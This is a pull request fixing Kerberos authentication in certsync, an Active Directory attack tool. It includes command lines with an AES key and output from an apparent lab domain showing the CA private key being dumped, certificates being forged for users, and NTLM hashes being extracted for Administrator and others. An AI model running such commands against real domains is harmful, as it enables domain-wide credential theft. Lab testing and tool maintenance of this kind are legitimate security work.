### PR TITLE
Fix kerberos authentication

### DIFF
--- a/certsync/entry.py
+++ b/certsync/entry.py
@@ -120,7 +120,8 @@ class CertSync:
             no_pass = options.no_pass,
             ns = options.ns,
             aes = options.aesKey,
-            target_ip = options.dc_ip)
+            target_ip = options.dc_ip,
+            remote_name = options.kdcHost)
 
         self.ca_ip = options.ca_ip
         self.user_search_filter = options.ldap_filter
@@ -211,7 +212,8 @@ class CertSync:
                 do_kerberos = self.target.do_kerberos,
                 hashes = self.options.hashes,
                 aes = self.target.aes,
-                remote_name = self.ca_ip_address)
+                remote_name = self.ca_dns_name,
+                no_pass = self.options.no_pass)
 
             ca_module = CA(target=ca_target, ca=self.ca_name)
             self.backup_ca_pki(ca_module)


### PR DESCRIPTION
Hello, 

I've faced some errors while using Kerberos authentication (ccache file or AES key). This fix works for me. Please let me know if it works for you as well. 

Thanks! 

Output before fix (ccache):
```
└─$ export KRB5CCNAME=daenerys.targaryen.ccache; certsync -d essos.local -u daenerys.targaryen -dc-ip 192.168.56.12 -k -use-kcache -no-pass -debug -kdcHost meereen.essos.local         
[*] Collecting userlist, CA info and CRL on LDAP
[-] Got error: 'NoneType' object has no attribute 'upper'
Traceback (most recent call last):
  File "/home/kali/.local/pipx/venvs/certsync/lib/python3.11/site-packages/certsync/entry.py", line 608, in main
    certsync.run()
  File "/home/kali/.local/pipx/venvs/certsync/lib/python3.11/site-packages/certsync/entry.py", line 169, in run
    self.init_ldap_conn()
  File "/home/kali/.local/pipx/venvs/certsync/lib/python3.11/site-packages/certsync/entry.py", line 161, in init_ldap_conn
    self.ldap_connection.connect()
  File "/home/kali/.local/pipx/venvs/certsync/lib/python3.11/site-packages/certipy/lib/ldap.py", line 77, in connect
    self.connect(version=ssl.PROTOCOL_TLSv1_2)
  File "/home/kali/.local/pipx/venvs/certsync/lib/python3.11/site-packages/certipy/lib/ldap.py", line 112, in connect
    self.LDAP3KerberosLogin(ldap_conn)
  File "/home/kali/.local/pipx/venvs/certsync/lib/python3.11/site-packages/certipy/lib/ldap.py", line 179, in LDAP3KerberosLogin
    _, _, blob, username = get_kerberos_type1(
                           ^^^^^^^^^^^^^^^^^^^
  File "/home/kali/.local/pipx/venvs/certsync/lib/python3.11/site-packages/certipy/lib/kerberos.py", line 229, in get_kerberos_type1
    tgs, cipher, session_key, username, domain = get_TGS(target, target_name, service)
                                                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/.local/pipx/venvs/certsync/lib/python3.11/site-packages/certipy/lib/kerberos.py", line 82, in get_TGS
    principal = "%s/%s@%s" % (service, target_name.upper(), domain.upper())
                                       ^^^^^^^^^^^^^^^^^
AttributeError: 'NoneType' object has no attribute 'upper'
``` 

Output before fix (AES):
```
└─$ certsync -d essos.local -u daenerys.targaryen  -aesKey cf091fbd07f729567ac448ba96c08b12fa67c1372f439ae093f67c6e2cf82378 -dc-ip 192.168.56.12 -kdcHost meereen -debug -k                                                         
[*] Collecting userlist, CA info and CRL on LDAP
[-] Got error: 'NoneType' object has no attribute 'upper'
Traceback (most recent call last):
  File "/home/kali/.local/pipx/venvs/certsync/lib/python3.11/site-packages/certsync/entry.py", line 608, in main
    certsync.run()
  File "/home/kali/.local/pipx/venvs/certsync/lib/python3.11/site-packages/certsync/entry.py", line 169, in run
    self.init_ldap_conn()
  File "/home/kali/.local/pipx/venvs/certsync/lib/python3.11/site-packages/certsync/entry.py", line 161, in init_ldap_conn
    self.ldap_connection.connect()
  File "/home/kali/.local/pipx/venvs/certsync/lib/python3.11/site-packages/certipy/lib/ldap.py", line 77, in connect
    self.connect(version=ssl.PROTOCOL_TLSv1_2)
  File "/home/kali/.local/pipx/venvs/certsync/lib/python3.11/site-packages/certipy/lib/ldap.py", line 112, in connect
    self.LDAP3KerberosLogin(ldap_conn)
  File "/home/kali/.local/pipx/venvs/certsync/lib/python3.11/site-packages/certipy/lib/ldap.py", line 179, in LDAP3KerberosLogin
    _, _, blob, username = get_kerberos_type1(
                           ^^^^^^^^^^^^^^^^^^^
  File "/home/kali/.local/pipx/venvs/certsync/lib/python3.11/site-packages/certipy/lib/kerberos.py", line 229, in get_kerberos_type1
    tgs, cipher, session_key, username, domain = get_TGS(target, target_name, service)
                                                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/.local/pipx/venvs/certsync/lib/python3.11/site-packages/certipy/lib/kerberos.py", line 82, in get_TGS
    principal = "%s/%s@%s" % (service, target_name.upper(), domain.upper())
                                       ^^^^^^^^^^^^^^^^^
AttributeError: 'NoneType' object has no attribute 'upper'
```

Output after fix (ccache):
```
└─$ export KRB5CCNAME=daenerys.targaryen.ccache; certsync -d essos.local -u daenerys.targaryen -dc-ip 192.168.56.12 -k -use-kcache -no-pass -debug -kdcHost meereen.essos.local
[*] Collecting userlist, CA info and CRL on LDAP
[*] Found 13 users in LDAP
[*] Found CA ESSOS-CA on braavos.essos.local(192.168.56.23)
[*] Dumping CA certificate and private key
[+] Creating new service
[+] Creating backup
[+] Retrieving backup
[+] Cleaning up
[*] Forging certificates for every users. This can take some time...
100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 13/13 [00:00<00:00, 1090.00it/s]
[*] PKINIT + UnPAC the hashes
ESSOS.LOCAL/Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::
ESSOS.LOCAL/snaplabs:1008:aad3b435b51404eeaad3b435b51404ee:bce55f57cff4bed0c0c8a9cf15a99b12:::
ESSOS.LOCAL/MEEREEN$:1009:aad3b435b51404eeaad3b435b51404ee:707d5c3567c47e9e9ce03ea9b1cac251:::
ESSOS.LOCAL/BRAAVOS$:1112:aad3b435b51404eeaad3b435b51404ee:f734b1180e450cb91c256abc529cc88d:::
ESSOS.LOCAL/SEVENKINGDOMS$:1113:aad3b435b51404eeaad3b435b51404ee:338bb5180c604fef73bb7d41a4edfa11:::
ESSOS.LOCAL/daenerys.targaryen:1118:aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a:::
ESSOS.LOCAL/viserys.targaryen:1119:aad3b435b51404eeaad3b435b51404ee:d96a55df6bef5e0b4d6d956088036097:::
ESSOS.LOCAL/khal.drogo:1120:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb5c9d37021:::
ESSOS.LOCAL/jorah.mormont:1121:aad3b435b51404eeaad3b435b51404ee:4d737ec9ecf0b9955a161773cfed9611:::
ESSOS.LOCAL/sql_svc:1122:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
[+] 10 users dumped. 3 users could not be dumped.
```

Output after fix (AES):
```
└─$ certsync -d essos.local -u daenerys.targaryen  -aesKey cf091fbd07f729567ac448ba96c08b12fa67c1372f439ae093f67c6e2cf82378 -dc-ip 192.168.56.12 -kdcHost meereen -debug -k
[*] Collecting userlist, CA info and CRL on LDAP
[*] Found 13 users in LDAP
[*] Found CA ESSOS-CA on braavos.essos.local(192.168.56.23)
[*] Dumping CA certificate and private key
[+] Creating new service
[+] Creating backup
[+] Retrieving backup
[+] Cleaning up
[*] Forging certificates for every users. This can take some time...
100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 13/13 [00:00<00:00, 1110.37it/s]
[*] PKINIT + UnPAC the hashes
ESSOS.LOCAL/Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::
ESSOS.LOCAL/snaplabs:1008:aad3b435b51404eeaad3b435b51404ee:bce55f57cff4bed0c0c8a9cf15a99b12:::
ESSOS.LOCAL/MEEREEN$:1009:aad3b435b51404eeaad3b435b51404ee:707d5c3567c47e9e9ce03ea9b1cac251:::
ESSOS.LOCAL/BRAAVOS$:1112:aad3b435b51404eeaad3b435b51404ee:f734b1180e450cb91c256abc529cc88d:::
ESSOS.LOCAL/SEVENKINGDOMS$:1113:aad3b435b51404eeaad3b435b51404ee:338bb5180c604fef73bb7d41a4edfa11:::
ESSOS.LOCAL/daenerys.targaryen:1118:aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a:::
ESSOS.LOCAL/viserys.targaryen:1119:aad3b435b51404eeaad3b435b51404ee:d96a55df6bef5e0b4d6d956088036097:::
ESSOS.LOCAL/khal.drogo:1120:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb5c9d37021:::
ESSOS.LOCAL/jorah.mormont:1121:aad3b435b51404eeaad3b435b51404ee:4d737ec9ecf0b9955a161773cfed9611:::
ESSOS.LOCAL/sql_svc:1122:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
[+] 10 users dumped. 3 users could not be dumped.

```
